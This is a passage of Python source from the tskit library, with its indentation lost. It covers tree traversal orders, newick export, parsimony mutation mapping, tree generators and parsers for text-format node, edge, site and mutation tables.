# as this will count the number of tracked _samples_. This is only provided to
# avoid breaking existing code and should not be used in new code. We could
# change this method to be semantically correct and just count the
# number of leaves we hit in the leaves() iterator. However, this would
# have the undesirable effect of making code that depends on the constant
# time performance of get_num_leaves many times slower. So, the best option
# is to leave this method as is, and to slowly deprecate it out. Once this
# has been removed, we might add in a ``num_leaves`` method that returns the
# length of the leaves() iterator as one would expect.
return self.num_samples(u)
def get_num_samples(self, u=None):
# Deprecated alias for num_samples.
return self.num_samples(u)
def num_samples(self, u=None):
"""
Returns the number of samples in this tree underneath the specified
node (including the node itself). If u is not specified return
the total number of samples in the tree.
This is a constant time operation.
:param int u: The node of interest.
:return: The number of samples in the subtree rooted at u.
:rtype: int
"""
if u is None:
return sum(self._ll_tree.get_num_samples(u) for u in self.roots)
else:
return self._ll_tree.get_num_samples(u)
def get_num_tracked_leaves(self, u):
# Deprecated alias for num_tracked_samples. The method name is inaccurate
# as this will count the number of tracked _samples_. This is only provided to
# avoid breaking existing code and should not be used in new code.
return self.num_tracked_samples(u)
def get_num_tracked_samples(self, u=None):
# Deprecated alias for num_tracked_samples
return self.num_tracked_samples(u)
def num_tracked_samples(self, u=None):
"""
Returns the number of samples in the set specified in the
``tracked_samples`` parameter of the :meth:`TreeSequence.trees` method
underneath the specified node. If the input node is not specified,
return the total number of tracked samples in the tree.
This is a constant time operation.
:param int u: The node of interest.
:return: The number of samples within the set of tracked samples in
the subtree rooted at u.
:rtype: int
"""
roots = [u]
if u is None:
roots = self.roots
return sum(self._ll_tree.get_num_tracked_samples(root) for root in roots)
def _preorder_traversal(self, u):
stack = collections.deque([u])
# For perf we store these to avoid lookups in the tight loop
pop = stack.pop
extend = stack.extend
get_children = self.children
# Note: the usual style is to be explicit about what we're testing
# and use while len(stack) > 0, but this form is slightly faster.
while stack:
v = pop()
extend(reversed(get_children(v)))
yield v
def _postorder_traversal(self, u):
stack = collections.deque([u])
parent = NULL
# For perf we store these to avoid lookups in the tight loop
pop = stack.pop
extend = stack.extend
get_children = self.children
get_parent = self.get_parent
# Note: the usual style is to be explicit about what we're testing
# and use while len(stack) > 0, but this form is slightly faster.
while stack:
v = stack[-1]
children = [] if v == parent else get_children(v)
if children:
extend(reversed(children))
else:
parent = get_parent(v)
yield pop()
def _inorder_traversal(self, u):
# TODO add a nonrecursive version of the inorder traversal.
children = self.get_children(u)
mid = len(children) // 2
for c in children[:mid]:
yield from self._inorder_traversal(c)
yield u
for c in children[mid:]:
yield from self._inorder_traversal(c)
def _levelorder_traversal(self, u):
queue = collections.deque([u])
# For perf we store these to avoid lookups in the tight loop
pop = queue.popleft
extend = queue.extend
children = self.children
# Note: the usual style is to be explicit about what we're testing
# and use while len(queue) > 0, but this form is slightly faster.
while queue:
v = pop()
extend(children(v))
yield v
def _timeasc_traversal(self, u):
"""
Sorts by increasing time but falls back to increasing ID for equal times.
"""
yield from sorted(
self.nodes(u, order="levelorder"), key=lambda u: (self.time(u), u)
)
def _timedesc_traversal(self, u):
"""
Sorts by decreasing time but falls back to decreasing ID for equal times.
"""
yield from sorted(
self.nodes(u, order="levelorder"),
key=lambda u: (self.time(u), u),
reverse=True,
)
def _minlex_postorder_traversal(self, u):
"""
Postorder traversal that visits leaves in minimum lexicographic order.
Minlex stands for minimum lexicographic. We wish to visit a tree in such
a way that the leaves visited, when their IDs are listed out, have
minimum lexicographic order. This is a useful ordering for drawing
multiple Trees of a TreeSequence, as it leads to more consistency
between adjacent Trees.
"""
# We skip perf optimisations here (compared to _preorder_traversal and
# _postorder_traversal) as this ordering is unlikely to be used in perf
# sensitive applications
stack = collections.deque([u])
parent = NULL
# We compute a dictionary mapping from internal node ID to min leaf ID
# under the node, using a first postorder traversal
min_leaf_dict = {}
while len(stack) > 0:
v = stack[-1]
children = [] if v == parent else self.children(v)
if children:
# The first time visiting a node, we push its children onto the stack.
# reversed is not strictly necessary, but it gives the postorder
# we would intuitively expect.
stack.extend(reversed(children))
else:
# The second time visiting a node, we record its min leaf ID
# underneath, pop it, and update the parent variable
if v != parent:
# at a leaf node
min_leaf_dict[v] = v
else:
# at a parent after finishing all its children
min_leaf_dict[v] = min([min_leaf_dict[c] for c in self.children(v)])
parent = self.get_parent(v)
stack.pop()
# Now we do a second postorder traversal
stack.clear()
stack.extend([u])
parent = NULL
while len(stack) > 0:
v = stack[-1]
children = [] if v == parent else self.children(v)
if children:
# The first time visiting a node, we push onto the stack its children
# in order of reverse min leaf ID under each child. This guarantees
# that the earlier children visited have smaller min leaf ID,
# which is equivalent to the minlex condition.
stack.extend(
sorted(children, key=lambda u: min_leaf_dict[u], reverse=True)
)
else:
# The second time visiting a node, we pop and yield it, and
# we update the parent variable
parent = self.get_parent(v)
yield stack.pop()
def nodes(self, root=None, order="preorder"):
"""
Returns an iterator over the node IDs reachable from the root(s) in this tree.
See :meth:`Tree.roots` for which nodes are considered roots. If the root
parameter is provided, only the subtree rooted at this single root node
will be iterated over. If this parameter is None, iterate over the node IDs in
the subtrees rooted at each root node in turn. If the order parameter is
provided, iterate over the nodes in each subtree in the specified tree traversal
order.
.. note::
Unlike the :meth:`TreeSequence.nodes` method, this iterator produces
integer node IDs, not :class:`Node` objects.
The currently implemented traversal orders are:
- 'preorder': starting at root, yield the current node, then recurse
and do a preorder on each child of the current node. See also `Wikipedia
<https://en.wikipedia.org/wiki/Tree_traversal#Pre-order_(NLR)>`__.
- 'inorder': starting at root, assuming binary trees, recurse and do
an inorder on the first child, then yield the current node, then
recurse and do an inorder on the second child. In the case of ``n``
child nodes (not necessarily 2), the first ``n // 2`` children are
visited in the first stage, and the remaining ``n - n // 2`` children
are visited in the second stage. See also `Wikipedia
<https://en.wikipedia.org/wiki/Tree_traversal#In-order_(LNR)>`__.
- 'postorder': starting at root, recurse and do a postorder on each
child of the current node, then yield the current node. See also
`Wikipedia
<https://en.wikipedia.org/wiki/Tree_traversal#Post-order_(LRN)>`__.
- 'levelorder' ('breadthfirst'): visit the nodes under root (including
the root) in increasing order of their depth from root. See also
`Wikipedia
<https://en.wikipedia.org/wiki/Tree_traversal\
#Breadth-first_search_/_level_order>`__.
- 'timeasc': visits the nodes in order of increasing time, falling back to
increasing ID if times are equal.
- 'timedesc': visits the nodes in order of decreasing time, falling back to
decreasing ID if times are equal.
- 'minlex_postorder': a usual postorder has ambiguity in the order in
which children of a node are visited. We constrain this by outputting
a postorder such that the leaves visited, when their IDs are
listed out, have minimum `lexicographic order
<https://en.wikipedia.org/wiki/Lexicographical_order>`__ out of all valid
traversals. This traversal is useful for drawing multiple trees of
a ``TreeSequence``, as it leads to more consistency between adjacent
trees. Note that internal non-leaf nodes are not counted in
assessing the lexicographic order.
:param int root: The root of the subtree we are traversing.
:param str order: The traversal ordering. Currently 'preorder',
'inorder', 'postorder', 'levelorder' ('breadthfirst'), 'timeasc' and
'timedesc' and 'minlex_postorder' are supported.
:return: An iterator over the node IDs in the tree in some traversal order.
:rtype: collections.abc.Iterable, int
"""
methods = {
"preorder": self._preorder_traversal,
"inorder": self._inorder_traversal,
"postorder": self._postorder_traversal,
"levelorder": self._levelorder_traversal,
"breadthfirst": self._levelorder_traversal,
"timeasc": self._timeasc_traversal,
"timedesc": self._timedesc_traversal,
"minlex_postorder": self._minlex_postorder_traversal,
}
try:
iterator = methods[order]
except KeyError:
raise ValueError(f"Traversal ordering '{order}' not supported")
roots = [root]
if root is None:
roots = self.roots
if order == "minlex_postorder" and len(roots) > 1:
# we need to visit the roots in minlex order as well
# we first visit all the roots and then sort by the min value
root_values = []
for u in roots:
root_minlex_postorder = list(iterator(u))
min_value = root_minlex_postorder[0]
root_values.append([min_value, root_minlex_postorder])
root_values.sort()
for _, nodes_for_root in root_values:
yield from nodes_for_root
else:
for u in roots:
yield from iterator(u)
def _node_edges(self):
"""
Return a numpy array mapping the node IDs in this tree to the ID of the edge
above them. This is in lieu of a tree.edge(u) function, currently implemented
using the non-optimised Python TreeSequence._tree_node_edges() generator
"""
for index, node_edge_map in enumerate( # pragma: no branch
self.tree_sequence._tree_node_edges()
):
if index == self.index:
return node_edge_map
# TODO make this a bit less embarrassing by using an iterative method.
def __build_newick(self, *, node, precision, node_labels, include_branch_lengths):
"""
Simple recursive version of the newick generator used when non-default
node labels are needed, or when branch lengths are omitted
"""
label = node_labels.get(node, "")
if self.is_leaf(node):
s = f"{label}"
else:
s = "("
for child in self.children(node):
branch_length = self.branch_length(child)
subtree = self.__build_newick(
node=child,
precision=precision,
node_labels=node_labels,
include_branch_lengths=include_branch_lengths,
)
if include_branch_lengths:
subtree += ":{0:.{1}f}".format(branch_length, precision)
s += subtree + ","
s = s[:-1] + f"){label}"
return s
def newick(
self,
precision=14, # Should probably be keyword only, left positional for legacy use
*,
root=None,
node_labels=None,
include_branch_lengths=True,
):
"""
Returns a `newick encoding <https://en.wikipedia.org/wiki/Newick_format>`_
of this tree. If the ``root`` argument is specified, return a representation
of the specified subtree, otherwise the full tree is returned. If the tree
has multiple roots then seperate newick strings for each rooted subtree
must be found (i.e., we do not attempt to concatenate the different trees).
By default, leaf nodes are labelled with their numerical ID + 1,
and internal nodes are not labelled. Arbitrary node labels can be specified
using the ``node_labels`` argument, which maps node IDs to the desired
labels.
.. warning:: Node labels are **not** Newick escaped, so care must be taken
to provide labels that will not break the encoding.
:param int precision: The numerical precision with which branch lengths are
printed.
:param int root: If specified, return the tree rooted at this node.
:param dict node_labels: If specified, show custom labels for the nodes
that are present in the map. Any nodes not specified in the map will
not have a node label.
:param include_branch_lengths: If True (default), output branch lengths in the
Newick string. If False, only output the topology, without branch lengths.
:return: A newick representation of this tree.
:rtype: str
"""
if root is None:
if not self.has_single_root:
raise ValueError(
"Cannot get newick unless a tree has a single root. Try "
"[t.newick(root) for root in t.roots] to get a list of "
"newick trees, one for each root."
)
root = self.root
if not include_branch_lengths and node_labels is None:
# C code always puts branch lengths: force Py code by setting default labels
node_labels = {i: str(i + 1) for i in self.leaves()}
if node_labels is None:
root_time = max(1, self.time(root))
max_label_size = math.ceil(math.log10(self.tree_sequence.num_nodes))
single_node_size = (
4 + max_label_size + math.ceil(math.log10(root_time)) + precision
)
buffer_size = 1 + single_node_size * self.num_nodes
s = self._ll_tree.get_newick(
precision=precision, root=root, buffer_size=buffer_size
)
s = s.decode()
else:
s = (
self.__build_newick(
node=root,
precision=precision,
node_labels=node_labels,
include_branch_lengths=include_branch_lengths,
)
+ ";"
)
return s
def as_dict_of_dicts(self):
"""
Convert tree to dict of dicts for conversion to a
`networkx graph <https://networkx.github.io/documentation/stable/
reference/classes/digraph.html>`_.
For example::
>>> import networkx as nx
>>> nx.DiGraph(tree.as_dict_of_dicts())
>>> # undirected graphs work as well
>>> nx.Graph(tree.as_dict_of_dicts())
:return: Dictionary of dictionaries of dictionaries where the first key
is the source, the second key is the target of an edge, and the
third key is an edge annotation. At this point the only annotation
is "branch_length", the length of the branch (in units of time).
"""
dod = {}
for parent in self.nodes():
dod[parent] = {}
for child in self.children(parent):
dod[parent][child] = {"branch_length": self.branch_length(child)}
return dod
@property
def parent_dict(self):
return self.get_parent_dict()
def get_parent_dict(self):
pi = {
u: self.parent(u) for u in range(self.num_nodes) if self.parent(u) != NULL
}
return pi
def __str__(self):
tree_rows = [
["Index", str(self.index)],
[
"Interval",
f"{self.interval.left:.8g}-{self.interval.right:.8g} ({self.span:.8g})",
],
["Roots", str(self.num_roots)],
["Nodes", str(self.num_nodes)],
["Sites", str(self.num_sites)],
["Mutations", str(self.num_mutations)],
["Total Branch Length", f"{self.total_branch_length:.8g}"],
]
return util.unicode_table(tree_rows, title="Tree")
def _repr_html_(self):
"""
Called by jupyter notebooks to render tables
"""
return util.tree_html(self)
def map_mutations(self, genotypes, alleles):
"""
Given observations for the samples in this tree described by the specified
set of genotypes and alleles, return a parsimonious set of state transitions
explaining these observations. The genotypes array is interpreted as indexes
into the alleles list in the same manner as described in the
:meth:`TreeSequence.variants` method. Thus, if sample ``j`` carries the
allele at index ``k``, then we have ``genotypes[j] = k``.
Missing observations can be specified for a sample using the value
``tskit.MISSING_DATA`` (-1), in which case the state at this sample does not
influence the ancestral state or the position of mutations returned. At least
one non-missing observation must be provided. A maximum of 64 alleles are
supported.
The current implementation uses the Hartigan parsimony algorithm to determine
the minimum number of state transitions required to explain the data. In this
model, transitions between any of the non-missing states is equally likely.
The returned values correspond directly to the data model for describing
variation at sites using mutations. See the :ref:`sec_site_table_definition`
and :ref:`sec_mutation_table_definition` definitions for details and background.
The state reconstruction is returned as two-tuple, ``(ancestral_state,
mutations)``, where ``ancestral_state`` is the allele assigned to the
tree root(s) and ``mutations`` is a list of :class:`Mutation` objects,
ordered as :ref:`required in a mutation table<sec_mutation_requirements>`.
For each mutation, ``node`` is the tree node at the bottom of the branch
on which the transition occurred, and ``derived_state`` is the new state
after this mutation. The ``parent`` property contains the index in the
returned list of the previous mutation on the path to root, or ``tskit.NULL``
if there are no previous mutations (see the :ref:`sec_mutation_table_definition`
for more information on the concept of mutation parents). All other attributes
of the :class:`Mutation` object are undefined and should not be used.
.. note::
Sample states observed as missing in the input ``genotypes`` need
not correspond to samples whose nodes are actually "missing" (i.e.
:ref:`isolated<sec_data_model_missing_data>`) in the tree. In this
case, mapping the mutations returned by this method onto the tree
will result in these missing observations being imputed to the
most parsimonious state.
See the :ref:`sec_tutorial_parsimony` section in the tutorial for examples
of how to use this method.
:param array_like genotypes: The input observations for the samples in this tree.
:param tuple(str) alleles: The alleles for the specified ``genotypes``. Each
positive value in the ``genotypes`` array is treated as an index into this
list of alleles.
:return: The inferred ancestral state and list of mutations on this tree
that encode the specified observations.
:rtype: (str, list(tskit.Mutation))
"""
genotypes = util.safe_np_int_cast(genotypes, np.int8)
if np.max(genotypes) >= 64:
raise ValueError("A maximum of 64 states is supported")
ancestral_state, transitions = self._ll_tree.map_mutations(genotypes)
# Translate back into string alleles
ancestral_state = alleles[ancestral_state]
mutations = [
Mutation(
node=node,
derived_state=alleles[derived_state],
parent=parent,
metadata=self.tree_sequence.table_metadata_schemas.mutation.empty_value,
)
for node, parent, derived_state in transitions
]
return ancestral_state, mutations
def kc_distance(self, other, lambda_=0.0):
"""
Returns the Kendall-Colijn distance between the specified pair of trees.
The ``lambda_`` parameter determines the relative weight of topology
vs branch lengths in calculating the distance. If ``lambda_`` is 0
(the default) we only consider topology, and if it is 1 we only
consider branch lengths. See `Kendall & Colijn (2016)
<https://academic.oup.com/mbe/article/33/10/2735/2925548>`_ for details.
The trees we are comparing to must have identical lists of sample
nodes (i.e., the same IDs in the same order). The metric operates on
samples, not leaves, so internal samples are treated identically to
sample tips. Subtrees with no samples do not contribute to the metric.
:param Tree other: The other tree to compare to.
:param float lambda_: The KC metric lambda parameter determining the
relative weight of topology and branch length.
:return: The computed KC distance between this tree and other.
:rtype: float
"""
return self._ll_tree.get_kc_distance(other._ll_tree, lambda_)
def split_polytomies(
self,
*,
epsilon=None,
method=None,
record_provenance=True,
random_seed=None,
**kwargs,
):
"""
Return a new :class:`.Tree` where extra nodes and edges have been inserted
so that any any node ``u`` with greater than 2 children --- a multifurcation
or "polytomy" --- is resolved into successive bifurcations. New nodes are
inserted at times fractionally less than than the time of node ``u``.
Times are allocated to different levels of the tree, such that any newly
inserted sibling nodes will have the same time.
By default, the times of the newly generated children of a particular
node are the minimum representable distance in floating point arithmetic
from their parents (using the `nextafter
<https://numpy.org/doc/stable/reference/generated/numpy.nextafter.html>`_
function). Thus, the generated branches have the shortest possible nonzero
length. A fixed branch length between inserted nodes and their parents
can also be specified by using the ``epsilon`` parameter.
.. note::
A tree sequence :ref:`requires<sec_valid_tree_sequence_requirements>` that
parents be older than children and that mutations are younger than the
parent of the edge on which they lie. If a fixed ``epsilon`` is specifed
and is not small enough compared to the distance between a polytomy and
its oldest child (or oldest child mutation) these requirements may not
be met. In this case an error will be raised.
If the ``method`` is ``"random"`` (currently the only option, and the default
when no method is specified), then for a node with :math:`n` children, the
:math:`(2n - 3)! / (2^(n - 2) (n - 2!))` possible binary trees with equal
probability.
The returned :class`.Tree` will have the same genomic span as this tree,
and node IDs will be conserved (that is, node ``u`` in this tree will
be the same node in the returned tree). The returned tree is derived from a
tree sequence that contains only one non-degenerate tree, that is, where
edges cover only the interval spanned by this tree.
:param epsilon: If specified, the fixed branch length between inserted
nodes and their parents. If None (the default), the minimal possible
nonzero branch length is generated for each node.
:param str method: The method used to break polytomies. Currently only "random"
is supported, which can also be specified by ``method=None``
(Default: ``None``).
:param bool record_provenance: If True, add details of this operation to the
provenance information of the returned tree sequence. (Default: True).
:param int random_seed: The random seed. If this is None, a random seed will
be automatically generated. Valid random seeds must be between 1 and
:math:`2^32 − 1`.
:param \\**kwargs: Further arguments used as parameters when constructing the
returned :class:`Tree`. For example
``tree.split_polytomies(sample_lists=True)`` will
return a :class:`Tree` created with ``sample_lists=True``.
:return: A new tree with polytomies split into random bifurcations.
:rtype: tskit.Tree
"""
return combinatorics.split_polytomies(
self,
epsilon=epsilon,
method=method,
record_provenance=record_provenance,
random_seed=random_seed,
**kwargs,
)
@staticmethod
def generate_star(
num_leaves, *, span=1, branch_length=1, record_provenance=True, **kwargs
):
"""
Generate a :class:`Tree` whose leaf nodes all have the same parent (i.e.
a "star" tree). The leaf nodes are all at time 0 and are marked as sample nodes.
The tree produced by this method is identical to
``tskit.Tree.unrank(n, (0, 0))``, but generated more efficiently for large ``n``.
:param int num_leaves: The number of leaf nodes in the returned tree (must be
2 or greater).
:param float span: The span of the tree, and therefore the
:attr:`~TreeSequence.sequence_length` of the :attr:`.tree_sequence`
property of the returned :class:`Tree`.
:param float branch_length: The length of every branch in the tree (equivalent
to the time of the root node).
:param bool record_provenance: If True, add details of this operation to the
provenance information of the returned tree sequence. (Default: True).
:param \\**kwargs: Further arguments used as parameters when constructing the
returned :class:`Tree`. For example
``tskit.Tree.generate_star(sample_lists=True)`` will
return a :class:`Tree` created with ``sample_lists=True``.
:return: A star-shaped tree. Its corresponding :class:`TreeSequence` is available
via the :attr:`.tree_sequence` attribute.
:rtype: Tree
"""
return combinatorics.generate_star(
num_leaves,
span=span,
branch_length=branch_length,
record_provenance=record_provenance,
**kwargs,
)
@staticmethod
def generate_balanced(
num_leaves,
*,
arity=2,
span=1,
branch_length=1,
record_provenance=True,
**kwargs,
):
"""
Generate a :class:`Tree` with the specified number of leaves that is maximally
balanced. By default, the tree returned is binary, such that for each
node that subtends :math:`n` leaves, the left child will subtend
:math:`\\lfloor{n / 2}\\rfloor` leaves and the right child the
remainder. Balanced trees with higher arity can also generated using the
``arity`` parameter, where the leaves subtending a node are distributed
among its children analogously.
In the returned tree, the leaf nodes are all at time 0, marked as samples,
and labelled 0 to n from left-to-right. Internal node IDs are assigned
sequentially from n in a postorder traversal, and the time of an internal
node is the maximum time of its children plus the specified ``branch_length``.
:param int num_leaves: The number of leaf nodes in the returned tree (must be
be 2 or greater).
:param int arity: The maximum number of children a node can have in the returned
tree.
:param float span: The span of the tree, and therefore the
:attr:`~TreeSequence.sequence_length` of the :attr:`.tree_sequence`
property of the returned :class:`Tree`.
:param float branch_length: The minimum length of a branch in the tree (see
above for details on how internal node times are assigned).
:param bool record_provenance: If True, add details of this operation to the
provenance information of the returned tree sequence. (Default: True).
:param \\**kwargs: Further arguments used as parameters when constructing the
returned :class:`Tree`. For example
``tskit.Tree.generate_balanced(sample_lists=True)`` will
return a :class:`Tree` created with ``sample_lists=True``.
:return: A balanced tree. Its corresponding :class:`TreeSequence` is available
via the :attr:`.tree_sequence` attribute.
:rtype: Tree
"""
return combinatorics.generate_balanced(
num_leaves,
arity=arity,
span=span,
branch_length=branch_length,
record_provenance=record_provenance,
**kwargs,
)
@staticmethod
def generate_comb(
num_leaves, *, span=1, branch_length=1, record_provenance=True, **kwargs
):
"""
Generate a :class:`Tree` in which all internal nodes have two children
and the left child is a leaf. This is a "comb", "ladder" or "pectinate"
phylogeny, and also known as a `caterpiller tree
<https://en.wikipedia.org/wiki/Caterpillar_tree>`_.
The leaf nodes are all at time 0, marked as samples,
and labelled 0 to n from left-to-right. Internal node IDs are assigned
sequentially from n as we ascend the tree, and the time of an internal
node is the maximum time of its children plus the specified ``branch_length``.
:param int num_leaves: The number of leaf nodes in the returned tree (must be
2 or greater).
:param float span: The span of the tree, and therefore the
:attr:`~TreeSequence.sequence_length` of the :attr:`.tree_sequence`
property of the returned :class:`Tree`.
:param float branch_length: The branch length between each internal node; the
root node is therefore placed at time ``branch_length * (num_leaves - 1)``.
:param bool record_provenance: If True, add details of this operation to the
provenance information of the returned tree sequence. (Default: True).
:param \\**kwargs: Further arguments used as parameters when constructing the
returned :class:`Tree`. For example
``tskit.Tree.generate_comb(sample_lists=True)`` will
return a :class:`Tree` created with ``sample_lists=True``.
:return: A comb-shaped bifurcating tree. Its corresponding :class:`TreeSequence`
is available via the :attr:`.tree_sequence` attribute.
:rtype: Tree
"""
return combinatorics.generate_comb(
num_leaves,
span=span,
branch_length=branch_length,
record_provenance=record_provenance,
**kwargs,
)
@staticmethod
def generate_random_binary(
num_leaves,
*,
span=1,
branch_length=1,
random_seed=None,
record_provenance=True,
**kwargs,
):
"""
Generate a random binary :class:`Tree` with :math:`n` = ``num_leaves``
leaves with an equal probability of returning any topology and
leaf label permutation among the :math:`(2n - 3)! / (2^(n - 2) (n - 2)!)`
leaf-labelled binary trees.
The leaf nodes are marked as samples, labelled 0 to n, and placed at
time 0. Internal node IDs are assigned sequentially from n as we ascend
the tree, and the time of an internal node is the maximum time of its
children plus the specified ``branch_length``.
.. note::
The returned tree has not been created under any explicit model of
evolution. In order to simulate such trees, additional software
such as `msprime <https://github.com/tskit-dev/msprime>`` is required.
:param int num_leaves: The number of leaf nodes in the returned tree (must
be 2 or greater).
:param float span: The span of the tree, and therefore the
:attr:`~TreeSequence.sequence_length` of the :attr:`.tree_sequence`
property of the returned :class:`Tree`.
:param float branch_length: The minimum time between parent and child nodes.
:param int random_seed: The random seed. If this is None, a random seed will
be automatically generated. Valid random seeds must be between 1 and
:math:`2^32 − 1`.
:param bool record_provenance: If True, add details of this operation to the
provenance information of the returned tree sequence. (Default: True).
:param \\**kwargs: Further arguments used as parameters when constructing the
returned :class:`Tree`. For example
``tskit.Tree.generate_comb(sample_lists=True)`` will
return a :class:`Tree` created with ``sample_lists=True``.
:return: A random binary tree. Its corresponding :class:`TreeSequence` is
available via the :attr:`.tree_sequence` attribute.
:rtype: Tree
"""
return combinatorics.generate_random_binary(
num_leaves,
span=span,
branch_length=branch_length,
random_seed=random_seed,
record_provenance=record_provenance,
**kwargs,
)
def load(file):
"""
Loads a tree sequence from the specified file object or path. The file must be in the
:ref:`tree sequence file format <sec_tree_sequence_file_format>` produced by the
:meth:`TreeSequence.dump` method.
:param str file: The file object or path of the ``.trees`` file containing the
tree sequence we wish to load.
:return: The tree sequence object containing the information
stored in the specified file path.
:rtype: :class:`tskit.TreeSequence`
"""
return TreeSequence.load(file)
def parse_individuals(
source, strict=True, encoding="utf8", base64_metadata=True, table=None
):
"""
Parse the specified file-like object containing a whitespace delimited
description of an individual table and returns the corresponding
:class:`IndividualTable` instance. See the :ref:`individual text format
<sec_individual_text_format>` section for the details of the required
format and the :ref:`individual table definition
<sec_individual_table_definition>` section for the required properties of
the contents.
See :func:`tskit.load_text` for a detailed explanation of the ``strict``
parameter.
:param io.TextIOBase source: The file-like object containing the text.
:param bool strict: If True, require strict tab delimiting (default). If
False, a relaxed whitespace splitting algorithm is used.
:param str encoding: Encoding used for text representation.
:param bool base64_metadata: If True, metadata is encoded using Base64
encoding; otherwise, as plain text.
:param IndividualTable table: If specified write into this table. If not,
create a new :class:`IndividualTable` instance.
"""
sep = None
if strict:
sep = "\t"
if table is None:
table = tables.IndividualTable()
# Read the header and find the indexes of the required fields.
header = source.readline().strip("\n").split(sep)
flags_index = header.index("flags")
location_index = None
parents_index = None
metadata_index = None
try:
location_index = header.index("location")
except ValueError:
pass
try:
parents_index = header.index("parents")
except ValueError:
pass
try:
metadata_index = header.index("metadata")
except ValueError:
pass
for line in source:
tokens = line.split(sep)
if len(tokens) >= 1:
flags = int(tokens[flags_index])
location = ()
if location_index is not None:
location_string = tokens[location_index]
if len(location_string) > 0:
location = tuple(map(float, location_string.split(",")))
parents = ()
if parents_index is not None:
parents_string = tokens[parents_index]
if len(parents_string) > 0:
parents = tuple(map(int, parents_string.split(",")))
metadata = b""
if metadata_index is not None and metadata_index < len(tokens):
metadata = tokens[metadata_index].encode(encoding)
if base64_metadata:
metadata = base64.b64decode(metadata)
table.add_row(
flags=flags, location=location, parents=parents, metadata=metadata
)
return table
def parse_nodes(source, strict=True, encoding="utf8", base64_metadata=True, table=None):
"""
Parse the specified file-like object containing a whitespace delimited
description of a node table and returns the corresponding :class:`NodeTable`
instance. See the :ref:`node text format <sec_node_text_format>` section
for the details of the required format and the
:ref:`node table definition <sec_node_table_definition>` section for the
required properties of the contents.
See :func:`tskit.load_text` for a detailed explanation of the ``strict``
parameter.
:param io.TextIOBase source: The file-like object containing the text.
:param bool strict: If True, require strict tab delimiting (default). If
False, a relaxed whitespace splitting algorithm is used.
:param str encoding: Encoding used for text representation.
:param bool base64_metadata: If True, metadata is encoded using Base64
encoding; otherwise, as plain text.
:param NodeTable table: If specified write into this table. If not,
create a new :class:`NodeTable` instance.
"""
sep = None
if strict:
sep = "\t"
if table is None:
table = tables.NodeTable()
# Read the header and find the indexes of the required fields.
header = source.readline().strip("\n").split(sep)
is_sample_index = header.index("is_sample")
time_index = header.index("time")
population_index = None
individual_index = None
metadata_index = None
try:
population_index = header.index("population")
except ValueError:
pass
try:
individual_index = header.index("individual")
except ValueError:
pass
try:
metadata_index = header.index("metadata")
except ValueError:
pass
for line in source:
tokens = line.split(sep)
if len(tokens) >= 2:
is_sample = int(tokens[is_sample_index])
time = float(tokens[time_index])
flags = 0
if is_sample != 0:
flags |= NODE_IS_SAMPLE
population = NULL
if population_index is not None:
population = int(tokens[population_index])
individual = NULL
if individual_index is not None:
individual = int(tokens[individual_index])
metadata = b""
if metadata_index is not None and metadata_index < len(tokens):
metadata = tokens[metadata_index].encode(encoding)
if base64_metadata:
metadata = base64.b64decode(metadata)
table.add_row(
flags=flags,
time=time,
population=population,
individual=individual,
metadata=metadata,
)
return table
def parse_edges(source, strict=True, table=None):
"""
Parse the specified file-like object containing a whitespace delimited
description of a edge table and returns the corresponding :class:`EdgeTable`
instance. See the :ref:`edge text format <sec_edge_text_format>` section
for the details of the required format and the
:ref:`edge table definition <sec_edge_table_definition>` section for the
required properties of the contents.
See :func:`tskit.load_text` for a detailed explanation of the ``strict`` parameter.
:param io.TextIOBase source: The file-like object containing the text.
:param bool strict: If True, require strict tab delimiting (default). If
False, a relaxed whitespace splitting algorithm is used.
:param EdgeTable table: If specified, write the edges into this table. If
not, create a new :class:`EdgeTable` instance and return.
"""
sep = None
if strict:
sep = "\t"
if table is None:
table = tables.EdgeTable()
header = source.readline().strip("\n").split(sep)
left_index = header.index("left")
right_index = header.index("right")
parent_index = header.index("parent")
children_index = header.index("child")
for line in source:
tokens = line.split(sep)
if len(tokens) >= 4:
left = float(tokens[left_index])
right = float(tokens[right_index])
parent = int(tokens[parent_index])
children = tuple(map(int, tokens[children_index].split(",")))
for child in children:
table.add_row(left=left, right=right, parent=parent, child=child)
return table
def parse_sites(source, strict=True, encoding="utf8", base64_metadata=True, table=None):
"""
Parse the specified file-like object containing a whitespace delimited
description of a site table and returns the corresponding :class:`SiteTable`
instance. See the :ref:`site text format <sec_site_text_format>` section
for the details of the required format and the
:ref:`site table definition <sec_site_table_definition>` section for the
required properties of the contents.
See :func:`tskit.load_text` for a detailed explanation of the ``strict``
parameter.
:param io.TextIOBase source: The file-like object containing the text.
:param bool strict: If True, require strict tab delimiting (default). If
False, a relaxed whitespace splitting algorithm is used.
:param str encoding: Encoding used for text representation.
:param bool base64_metadata: If True, metadata is encoded using Base64
encoding; otherwise, as plain text.
:param SiteTable table: If specified write site into this table. If not,
create a new :class:`SiteTable` instance.
"""
sep = None
if strict:
sep = "\t"
if table is None:
table = tables.SiteTable()
header = source.readline().strip("\n").split(sep)
position_index = header.index("position")
ancestral_state_index = header.index("ancestral_state")
metadata_index = None
try:
metadata_index = header.index("metadata")
except ValueError:
pass
for line in source:
tokens = line.split(sep)
if len(tokens) >= 2:
position = float(tokens[position_index])
ancestral_state = tokens[ancestral_state_index]
metadata = b""
if metadata_index is not None and metadata_index < len(tokens):
metadata = tokens[metadata_index].encode(encoding)
if base64_metadata:
metadata = base64.b64decode(metadata)
table.add_row(
position=position, ancestral_state=ancestral_state, metadata=metadata
)
return table
def parse_mutations(
source, strict=True, encoding="utf8", base64_metadata=True, table=None
):
"""
Parse the specified file-like object containing a whitespace delimited
description of a mutation table and returns the corresponding :class:`MutationTable`
instance. See the :ref:`mutation text format <sec_mutation_text_format>` section
for the details of the required format and the
:ref:`mutation table definition <sec_mutation_table_definition>` section for the
required properties of the contents. Note that if the ``time`` column is missing its
entries are filled with ``UNKNOWN_TIME``.
See :func:`tskit.load_text` for a detailed explanation of the ``strict``
parameter.
:param io.TextIOBase source: The file-like object containing the text.
:param bool strict: If True, require strict tab delimiting (default). If
False, a relaxed whitespace splitting algorithm is used.
:param str encoding: Encoding used for text representation.
:param bool base64_metadata: If True, metadata is encoded using Base64
encoding; otherwise, as plain text.
:param MutationTable table: If specified, write mutations into this table.
If not, create a new :class:`MutationTable` instance.
"""
sep = None
if strict:
sep = "\t"
if table is None:
table = tables.MutationTable()
header = source.readline().strip("\n").split(sep)
site_index = header.index("site")
node_index = header.index("node")
try:
time_index = header.index("time")
except ValueError:
time_index = None
derived_state_index = header.index("derived_state")
parent_index = None
parent = NULL
try:
parent_index = header.index("parent")
except ValueError:
pass
